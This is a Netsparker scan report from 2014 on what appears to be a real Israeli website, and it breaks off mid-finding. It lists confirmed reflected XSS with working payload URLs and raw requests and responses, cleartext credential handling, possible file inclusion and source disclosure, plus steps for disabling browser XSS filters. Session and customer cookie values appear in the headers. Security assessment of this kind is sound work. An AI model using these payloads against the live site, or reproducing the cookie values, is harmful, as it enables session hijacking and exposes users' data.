
NETSPARKER SCAN REPORT SUMMARY

Target URL:     http://www.tariel.co.il/
Scan Date:      26 17:32:51 2014
Report Date:    26 18:37:54 2014
Scan Duration:  01:05:03
Total Requests: 10888
Average Speed:  2.79 req/sec.

Identified:     21
Confirmed:      10
Critical:       0
Informational:  5

SCAN SETTINGS
Enabled Engines: Static Tests, Find Backup Files, SQL Injection, Boolean SQL Injection, Blind SQL Injection, Cross-site Scripting, Command Injection, Blind Command Injection, Local File Inclusion, Remote File Inclusion, Remote Code Evaluation, HTTP Header Injection, Open Redirection, Expression Language Injection
Authentication:
Scheduled:

VULNERABILITIES BY SEVERITY
Important:   33%
Medium:      33%
Low:         10%
Information: 24%

VULNERABILITY SUMMARY

URL | Parameter | Method | Vulnerability | Confirmed
/ | ArticleID | GET | Cross-site Scripting | Yes
/ | Query Based | Query String | Cross-site Scripting | Yes
/ | ArticleID | GET | Cross-site Scripting | Yes
/ | | | Password Transmitted Over HTTP | Yes
/ | | | [Possible] Local File Inclusion | No
/ | | | [Possible] ColdFusion Source Code Disclosure | No
/ | | | Auto Complete Enabled | Yes
/ | | | Cookie Not Marked As HttpOnly | Yes
/ | | | E-mail Address Disclosure | No
/_Uploads/dbsBanners/ | | | Forbidden Resource | Yes
/hanacha | | | [Possible] ColdFusion Source Code Disclosure | No
/katavim | | | [Possible] ColdFusion Source Code Disclosure | No
/komuna | | | [Possible] ColdFusion Source Code Disclosure | No
/megazin | | | [Possible] ColdFusion Source Code Disclosure | No
/melia | | | [Possible] ColdFusion Source Code Disclosure | No
/new/ | | | Basic Authentication over Clear Text | Yes
/robots.txt | | | Robots.txt Identified | Yes
/shamaim | | | [Possible] ColdFusion Source Code Disclosure | No
/sitemap.xml | | | IIS Version Disclosure | No
/sitemap.xml | | | Sitemap Identified | No
/ViewImage.asp | Image | GET | Cross-site Scripting | Yes


1. Cross-site Scripting

4 TOTAL | IMPORTANT | CONFIRMED: 4

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking the user's active session.
- Mounting phishing attacks.
- Intercepting data and performing man-in-the-middle attacks.

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then the output needs to be encoded accordingly. Encoding can get very complex; therefore it is strongly recommended to use an encoding library such as OWASP ESAPI or the Microsoft Anti-Cross-Site Scripting Library.

Remedy References
- Microsoft Anti-XSS Library
- OWASP XSS Prevention Cheat Sheet
- OWASP AntiSamy Java

External References
- XSS Cheat Sheet
- OWASP - Cross-site Scripting
- XSS Shell
- XSS Tunnelling

Proof of Concept Notes
The generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that XSS filtering is a feature that is enabled by default in some modern browsers. It should only be disabled temporarily to test exploits and should be reverted if the browser is actively used for purposes other than testing. Even though browsers have certain checks to prevent cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism; therefore a web application should not rely on this kind of client-side browser check.

Chrome
1. Open a command prompt.
2. Go to the folder where chrome.exe is located.
3. Run the command chrome.exe --args --disable-xss-auditor

Internet Explorer
1. Click Tools->Internet Options and then navigate to the Security tab.
2. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to Disabled.
3. Click OK. Click Yes to accept the warning, followed by Apply.

Firefox
1. Go to about:config in the URL address bar.
2. In the search field, type urlbar.filter and find browser.urlbar.filter.javascript.
3. Set its value to false by double-clicking the row.

Classification: OWASP A2, PCI v1.2-6.5.1, PCI v2.0-6.5.7, CWE-79, CAPEC-19, WASC-08


1.1. /ViewImage.asp (CONFIRMED)
http://www.tariel.co.il/ViewImage.asp?Image=javascript:alert(0x000246)

Parameters
Parameter | Type | Value
Image | GET | javascript:alert(0x000246)

Request
GET /ViewImage.asp?Image=javascript:netsparker(0x000246) HTTP/1.1
Referer: http://www.tariel.co.il/_JS/Funclib.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32; CustomerPassword=51%5F; CustomerMail=190%5F247%5F189%5F4%5F15%5F235%5F215%5F127%5F55%5F13%5F0%5F97%5F37%5F68%5F149%5F70%5F203%5F195%5F178%5F245%5F162%5F126%5F
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Date: Mon, 26 May 2014 15:12:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1685
Content-Type: text/html; Charset=UTF-8
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="he"> <head> <title> ‫י ה והוו‬ ‫< י‬/title> <META HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8"> <base href="http://www.tariel.co.il/"/> <script type="text/javascript" language="javascript" src="_JS/Funclib.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/Site/modFormValidatorHU.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/dbsAjax.js"></script> <script type="text/javascript" language="javascript"> var sAppDomain = "http://www.tariel.co.il"; </script> <link rel="STYLESHEET" type="text/css" href="http://www.tariel.co.il/_Pics/Grid_0/main.css"> <link rel="STYLESHEET" type="text/css" href="_Pics/Common/content.css"> </head> <body onLoad="focus();" class="Popup"> <table cellpadding="0" cellspacing="0" align="center"> <tr> <td><br></td> </tr> <tr> <td style="border: 2px solid #FFFFFF;"><img src="javascript:netsparker(0x000246)" alt="" width="800" style="border: 1px solid #000000;"><div class="FullImgCaption"></div> </td> </tr> <tr> <td dir="rtl" align="left" height="36" valign="middle" class="dont_print">&nbsp;<input type="Button" onclick="self.close();" class="button" style="width:70px;" value="‫הויה‬ ‫ " י‬title=" ‫י‬ ‫ "הויה‬class="button">&nbsp;&nbsp;&nbsp;&nbsp;<input type="Button" style="width:70px;" onclick="self.print();" class="button" value="‫ה‬ " title="‫ה‬ ">&nbsp;</td> </tr> </table><br> </body> </html>

1.2. / (CONFIRMED)
http://www.tariel.co.il/?CategoryID=2545&ArticleID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters
Parameter | Type | Value
CategoryID | GET | 2545
ArticleID | GET | '"--></style></script> <script>alert(0x000110)</script>
dbsAuthToken | GET | 3

Request
GET /?CategoryID=2545&ArticleID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000110)%3C/script%3E&dbsAuthToken=3 HTTP/1.1
Referer: http://www.tariel.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32
Accept-Encoding: gzip, deflate

Response … .il/"> <meta name="keywords" content=""> <meta name="description" content=" ‫ו וכ כוו ה‬ ‫ו יבוי‬ ‫>" ו יוי בו‬ <link rel="canonical" href="http://www.tariel.co.il/?categoryid=2545&articleid='"--></style></script><script>netsparker(0x000110)</script>" /> <script type="text/javascript" language="javascript" src="_JS/Funclib.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/Site …

1.3. / (CONFIRMED)
http://www.tariel.co.il/?"></script><script>alert(9)</script>

Parameters
Parameter | Type | Value
'"--></style></script> <script>netsparker(0x000020)</script> | GET |
Query Based | Query String | "></script><script>alert(9)</script>

Request
GET /?"></script><script>netsparker(9)</script> HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32
Accept-Encoding: gzip, deflate

Response … p;</span> <a href="?pg=subscribe&amp;CategoryID=754">

‫< הי‬/a>

</p> <input type="hidden" name="CatID" value="0"> <input type="hidden" name="PathInfo" value=""></script><script>netsparker(9)</script>"> </form> </div> </div> <div class="NavigationBarSM NavigationBarSMbyID1"><ul id="Menu1" class="MM1"> <li class="NavigationHorizontalFirst Navigat …

1.4. / (CONFIRMED)
http://www.tariel.co.il/?CategoryID=1797&ArticleID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters
Parameter | Type | Value
CategoryID | GET | 1797
ArticleID | GET | '"--></style></script> <script>alert(0x0003AB)</script>
KeyWords | GET | 3
SearchCategory | GET | 3
SearchPage | GET | 3

Request
GET /?CategoryID=1797&ArticleID='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003AB)%3C/script%3E&KeyWords=3&SearchCategory=3&SearchPage=3 HTTP/1.1
Referer: http://www.tariel.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32; CustomerPassword=51%5F; CustomerMail=190%5F247%5F189%5F4%5F15%5F235%5F215%5F127%5F55%5F13%5F0%5F97%5F37%5F68%5F149%5F70%5F203%5F195%5F178%5F245%5F162%5F126%5F
Accept-Encoding: gzip, deflate

Response … =""> <meta name="description" content="‫י ם וו ווכ י ו הוכ‬ ‫והוו‬ ‫י‬ ‫כהו‬ ‫ יהי וכ י‬:‫ייו‬ ‫י ו‬ ‫כם ויהו‬."> <link rel="canonical" href="http://www.tariel.co.il/?categoryid=1797&articleid='"--></style></script><script>netsparker(0x0003ab)</script>" /> <script type="text/javascript" language="javascript" src="_JS/Funclib.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/Site …

2. Basic Authentication over Clear Text

1 TOTAL | IMPORTANT | CONFIRMED: 1

Netsparker identified that the application is using Basic Authentication over HTTP. Basic Authentication sends the username and password in plain text. Generally, using Basic Authentication is not a good solution.

Impact
If an attacker can intercept traffic on the network, he/she might be able to steal the user's credentials.

Actions to Take
1. See the remedy for the solution.
2. Move all of your directories which require authentication to be served only over HTTPS, and disable any access to these pages over HTTP.

Classification: OWASP A9, PCI v1.2-6.5.9, PCI v2.0-6.5.4, CWE-319, CAPEC-65, WASC-04

2.1. /new/ (CONFIRMED)
http://www.tariel.co.il/new/?CategoryID=1680&SubjectID=&TitleSearchString=%D7%A4%D7%95%D7%9C%D7%90%D..

Request
GET /new/?CategoryID=1680&SubjectID=&TitleSearchString=%D7%A4%D7%95%D7%9C%D7%90%D7%A8%D7%93&Action=%D7%97%D7%25 HTTP/1.1
Referer: http://www.tariel.co.il/?CategoryID=605&dbsRW=1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 401 Unauthorized
Content-Length: 1656
Content-Type: text/html
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="Please enter user and password"
X-Powered-By: ASP.NET
Date: Mon, 26 May 2014 14:35:37 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Expires: Tue, 01 Jan 1971 02:00:00 GMT

<!DOCTYPE HTML …


3. Password Transmitted Over HTTP

1 TOTAL | IMPORTANT | CONFIRMED: 1

Netsparker identified that password data is sent over HTTP.

Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take
1. See the remedy for the solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

Classification: OWASP A9, PCI v1.2-6.5.9, PCI v2.0-6.5.4, CWE-319, CAPEC-65, WASC-04

3.1. / (CONFIRMED)
http://www.tariel.co.il/?CategoryID=1797&ArticleID=4122&KeyWords=&SearchCategory=&SearchPage=

Form target action: http://www.tariel.co.il/PostLogin.asp

Request
GET /?CategoryID=1797&ArticleID=4122&KeyWords=&SearchCategory=&SearchPage= HTTP/1.1
Referer: http://www.tariel.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD
Accept-Encoding: gzip, deflate

Response
HTTP/1.1 200 OK
Date: Mon, 26 May 2014 14:33:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1015369
Content-Type: text/html; Charset=UTF-8
Cache-control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="he"> <!-- Daronet DBS2004 12/03/2014 11:32:00 -->

<head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="index,follow"> <meta http-equiv="X-UA-Compatible" content="IE=7, IE=9"> <title>‫<םיהוכ‬/title> <base href="http://www.tariel.co.il/"> <meta name="keywords" content=""> <meta name="description" content=""> <link rel="canonical" href="http://www.tariel.co.il/?categoryid=1797&articleid=4122" /> <script type="text/javascript" language="javascript" src="_JS/Funclib.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/Site/modFormValidatorHU.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/dbsAjax.js"></script> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script> <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script> <script type="text/javascript" language="javascript"> var sAppDomain = "http://www.tariel.co.il"; var sRatingMsg = "‫והיות‬ ‫;" י‬ var sOneStarMsg = "1 ‫;"ביבכ‬ var sTwoStarsMsg = "2 ‫;"ביבכוכ‬ var sThreeStarsMsg = "3 ‫;"ביבכוכ‬ var sFourStarsMsg = "4 ‫;"ביבכוכ‬ var sFiveStarsMsg = "5 ‫;"ביבכוכ‬ var c_styles = {}; var c_menus = {}; var c_hideTimeout = 500; // 1000==1 second var c_subShowTimeout = 250; var c_keepHighlighted = true; var c_findCURRENT = false; // find the item linking to the current page and apply it the CURRENT st …



4. [Possible] Local File Inclusion

1 TOTAL | IMPORTANT

A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page. However, this issue could not be confirmed by Netsparker. Netsparker believes that this was not a Local File Inclusion; however, there were some indications of a possible LFI. There can be numerous reasons for Netsparker not being able to confirm it. We strongly recommend you investigate the issue manually. You can also consider sending us the details of this issue so we can address it next time and give you more precise results.

Impact
Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors, an attacker might carry out one or more of the following attacks:
- Gather usernames via the /etc/passwd file.
- Harvest useful information from the log files, such as "/apache/logs/error.log" or "/apache/logs/access.log".
- Remotely execute commands by combining this vulnerability with other attack vectors, such as a file upload vulnerability or log injection.

Remedy
If possible, do not permit file paths to be appended directly. Make them hard-coded or selectable from a limited hard-coded path list via an index variable. If you definitely need dynamic path concatenation, ensure you only accept required characters such as "a-Z0-9" and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters. It is important to limit the API to allow inclusion only from a directory and the directories below it. This ensures that any potential attack cannot perform a directory traversal attack.

Classification: OWASP A4, PCI v1.2-6.5.4, PCI v2.0-6.5.1, CWE-98, CAPEC-251, WASC-33

4.1. /
http://www.tariel.co.il/?3

Certainty

Request
GET /?3 HTTP/1.1
Referer: http://www.tariel.co.il/PostLogin.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32; CustomerPassword=51%5F; CustomerMail=190%5F247%5F189%5F4%5F15%5F235%5F215%5F127%5F55%5F13%5F0%5F97%5F37%5F68%5F149%5F70%5F203%5F195%5F178%5F245%5F162%5F126%5F
Accept-Encoding: gzip, deflate

Response … fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div class="separator clearfix"> <div class="sidebar align"> <div class="recent_forum recen …


5. [Possible] ColdFusion Source Code Disclosure

7 TOTAL | MEDIUM

Netsparker identified a web page that possibly discloses ColdFusion (server-side) source code. An attacker can obtain server-side source code of the web application, which can contain sensitive data such as database connection strings, usernames and passwords, along with the technical and business logic of the application.

Impact
Depending on the source code, database connection strings, usernames and passwords, the internal workings and the business logic of the application might be revealed. With such information, an attacker can mount the following types of attacks:
- Access the database or other data resources. Depending on the privileges of the account obtained from the source code, it may be possible to read, update or delete arbitrary data from the database.
- Gain access to password-protected administrative mechanisms such as dashboards, management consoles and admin panels, hence gaining full control of the application.
- Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.

Actions to Take
1. Confirm exactly what aspects of the source code are actually disclosed; due to the limitations of these types of vulnerability, it might not be possible to confirm this in all instances. Confirm this is not intended functionality.
2. If it is a file required by the application, change its permissions to prevent public users from accessing it. If it is not, then remove it from the web server.
3. Ensure that the server has all the current security patches applied.
4. Remove all temporary and backup files from the web server.

Required Skills for Successful Exploitation
This is dependent on the information obtained from the source code. Uncovering these forms of vulnerabilities does not require high levels of skill. However, a highly skilled attacker could leverage this form of vulnerability to obtain account information from databases or administrative panels, ultimately leading to the control of the application or even the host the application resides on.

External References
- Secureyes - Source Code Disclosure over HTTP

Classification: PCI v1.2-6.5.6, PCI v2.0-6.5.6, CWE-540, CAPEC-118, WASC-13

5.1. /
http://www.tariel.co.il/

Certainty

Request
GET / HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response … fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div class="separator clearfix"> <div class="sidebar align"> <div class="recent_forum recen …


5.2. /melia
http://www.tariel.co.il/melia

Certainty

Request
GET /melia HTTP/1.1
Referer: http://www.tariel.co.il/CategoriesMap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32
Accept-Encoding: gzip, deflate

Response … fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div id="ctlContent"><a name="dbsPgCnt"></a><div id="Body0"> <script type="text/javascript" language="javascript"> var nInterval; $(document).ready(function() { //Show Banner $(".main_ima …

5.3. /katavim
http://www.tariel.co.il/katavim

Certainty

Request
GET /katavim HTTP/1.1
Referer: http://www.tariel.co.il/CategoriesMap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32
Accept-Encoding: gzip, deflate

Response … fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div id="Footer" class="clearfix"> <div id="NavHorizontalSimpleByID685"><ul id="navlist685" class="NavigationBarSimple NavigationBarSimpleByID685"><li cla …

5.4. /hanacha
http://www.tariel.co.il/hanacha

Certainty

Request
GET /hanacha HTTP/1.1
Referer: http://www.tariel.co.il/CategoriesMap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.tariel.co.il
Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32
Accept-Encoding: gzip, deflate

Response … fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div id="ctlContent"><a name="dbsPgCnt"></a><div id="Body0"> <script type="text/javascript" language="javascript"> var nInterval; $(document).ready(function() { //Show Banner $(".main_ima …

5.5. /komuna
http://www.tariel.co.il/komuna

Certainty

Request
GET /komuna HTTP/1.1
Referer: http://www.tariel.co.il/
